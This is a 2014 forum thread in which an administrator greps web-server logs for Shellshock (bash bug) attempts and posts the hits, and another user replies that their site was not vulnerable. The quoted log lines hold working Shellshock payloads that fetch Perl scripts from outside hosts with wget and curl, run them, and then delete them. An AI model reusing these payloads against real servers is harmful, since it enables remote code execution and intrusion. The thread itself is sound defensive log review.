DARK HQ
http://www.darkhq.com/bb/

Shell Shocked
http://www.darkhq.com/bb/viewtopic.php?f=39&t=6916
Page 1 of 1

Author:  WeaselSqueezer [ Fri Oct 03, 2014 8:54 am ]
Post subject:  Shell Shocked

Here is a query to see who's been trying to hack this server with the bash bug:

Code:
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log.1
89.207.135.125 - - [25/Sep/2014:06:40:29 -0400] mail.mdve.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:06:42:05 -0400] * "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
94.75.234.44 - - [26/Sep/2014:08:59:35 -0400] 208.64.36.69 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.70 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.73 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.75 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
54.251.83.67 - - [27/Sep/2014:12:41:22 -0400] 208.64.36.75 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [27/Sep/2014:12:54:30 -0400] 208.64.36.73 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
54.251.83.67 - - [29/Sep/2014:01:59:25 -0400] 208.64.36.70 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [29/Sep/2014:07:25:02 -0400] 208.64.36.69 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
98.126.4.18 - - [01/Oct/2014:14:10:19 -0400] darkhq.com "GET /cgi-bin/hi HTTP/1.1" 404 284 "-" "() { :;};echo mizwkafnh7bvh6sk2dr2$(curl 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D'; wget -qO- 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D';)mizwkafnh7bvh6sk2dr2"


Ha ha, go away script kiddies, we're all patched here!

Author:  Ponj [ Fri Oct 03, 2014 5:09 pm ]
Post subject:  Re: Shell Shocked

WeaselSqueezer wrote:
Ha ha, go away script kiddies, we're all patched here!


Lulz, we (player.me) were already never vulnerable to this because of us never using apache, cgi (fastcgi isn't vuln), nor exposing anything other than what was necessary. We actually did get quite a few attempts on day zero though, to no avail! :D

Page 1 of 1 All times are UTC - 5 hours [ DST ]
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
http://www.phpbb.com/